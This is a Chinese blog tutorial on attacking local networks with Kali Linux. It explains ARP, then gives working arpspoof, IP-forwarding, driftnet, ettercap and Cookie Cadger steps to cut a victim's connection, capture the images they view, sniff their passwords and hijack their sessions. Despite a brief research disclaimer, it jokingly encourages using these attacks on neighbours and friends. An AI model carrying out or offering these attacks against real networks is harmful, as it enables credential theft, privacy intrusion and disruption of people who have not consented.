内网渗透

0nise带你玩转kali之局域网安全 heatlevel

字号+ 作者:0nise 来源:转载 2016-11-25 09:41 我要评论( )

免责声明:本文劲用于安全研究和交流,风险自负。 一说到网络攻击:大伙第一印象就是Ddos攻击,其实在我们生活中局域网攻击也是不容小觑的,大到咖啡厅的,小到隔壁老王......

免责声明:本文劲用于安全研究和交流,风险自负。

一说到网络攻击:大伙第一印象就是Ddos攻击,其实在我们生活中局域网攻击也是不容小觑的,大到咖啡厅的,小到隔壁老王家。
我草这么突然没网了,去问问隔壁老王。竟然在玩arp攻击。。。。
ARP 地址解析协议):
地址解析协议,即ARP(Address Resolution Protocol),是根据IP地址获取物理地址的一个TCP/IP协议。

ARP运行过程:
主机A的IP地址为192.168.1.1,MAC地址为0A-11-22-33-44-01;
主机B的IP地址为192.168.1.2,MAC地址为0A-11-22-33-44-02;
当主机A要与主机B通信时,地址解析协议可以将主机B的IP地址(192.168.1.2)解析成主机B的MAC地址,以下为工作流程:
第1步:根据主机A上的路由表内容,IP确定用于访问主机B的转发IP地址是192.168.1.2。然后A主机在自己的本地ARP缓存中检查主机B的匹配MAC地址。
第2步:如果主机A在ARP缓存中没有找到映射,它将询问192.168.1.2的硬件地址,从而将ARP请求帧广播到本地网络上的所有主机。源主机A的 IP地址和MAC地址都包括在ARP请求中。本地网络上的每台主机都接收到ARP请求并且检查是否与自己的IP地址匹配。如果主机发现请求的IP地址与自 己的IP地址不匹配,它将丢弃ARP请求。
第3步:主机B确定ARP请求中的IP地址与自己的IP地址匹配,则将主机A的IP地址和MAC地址映射添加到本地ARP缓存中。
第4步:主机B将包含其MAC地址的ARP回复消息直接发送回主机A。
第5步:当主机A收到从主机B发来的ARP回复消息时,会用主机B的IP和MAC地址映射更新ARP缓存。本机缓存是有生存期的,生存期结束后,将再次重复上面的过程。主机B的MAC地址一旦确定,主机A就能向主机B发送IP通信了。

局域网断网攻击:  首先要攻击的话我们需要知道受害者在局域网中的ip地址,为了不造成破坏我拿本机做实验。
  1. fping -asg 192.168.0.100/24
复制代码

  kali中执行上面命令,可以发现有三台局域网中的主机其中:192.168.0.103是我的本机
   
   
  先确保本机能上网,ping百度看看,ok没问题。
  
  然后在查查网关多少。
  该有的都有了,接下来就应该攻击了,还等什么?
  1. arpspoof -i eth0 -t 192.168.0.103 192.168.0.1
复制代码
  

  
  在本机我看到,已经断网了QQ都已经掉了。。。。。(我给我的马赛克技术打个满分)

  如果你旁边的小伙伴打LOL给他给断网,这将会是一个好玩的事情,当然你会在1分钟后被你的小伙伴打死。。。。
  我希望玩隔壁老王,而且是在玩LOL的时候。。。
  如果你觉得断网攻击已经很‘牛’的话,我觉得下面的这个更牛。。。。
获取局域网中目标的图片浏览记录(我们可以看看隔壁老王在看哪个美女):
  首先在我们的kaili中设置流量转发。
  1. echo 1 > /proc/sys/net/ipv4/ip_forward
复制代码

1是开启0是关闭  然后就是我们上面的arp欺骗
  1. arpspoof -i eth0 -t 192.168.0.103 192.168.0.1
  2. arpspoof -i //网卡 -t 目标局域网ip 网关
复制代码

  然后在通过driftnet抓图片咯
  1. driftnet -i eth0
  2. driftnet -i //网卡
复制代码

  然后我们就阔以看到图片咯
不要忘记玩完之后关闭流量转发
  1. echo 0 > /proc/sys/net/ipv4/ip_forward
复制代码
账号密码抓取(们来看看隔壁老王的账号密码):
  话说这么叼?可以获取密码?
  木有错,阔以!!!!
  首先在我们的kaili中设置流量转发。
  1. echo 1 > /proc/sys/net/ipv4/ip_forward
复制代码
  然后就是我们的arp欺骗
  1. arpspoof -i eth0 -t 192.168.0.103 192.168.0.1
  2. arpspoof -i //网卡 -t 目标局域网ip 网关
复制代码

  以某个论坛为例,通过ettercap来抓取
  1. ettercap -Tq -i eth0
复制代码

然后我们就阔以看到账号密码了
会话劫持:
   
这里我们用一个java的写的工具,Cookie Cadger。(我非常的喜欢玩它)
   只需要配置一下网卡就阔以完了
   
   然后开始扫描就阔以看到了
  CookieCadger下载地址:
  链接: http://pan.baidu.com/s/1miruxg0 密码: hgsi

本文来自: 蜗蜗侠's Blog-关注网络安全 http://blog.icxun.cn/hack/Intranet/259.html

1.本站遵循行业规范,任何转载的稿件都会明确标注作者和来源;2.本站的原创文章,请转载时务必注明文章作者和来源,不尊重原创的行为我们将追究责任;3.作者投稿可能会经我们编辑修改或补充。

相关文章
网友点评
暂时未开启评论功能~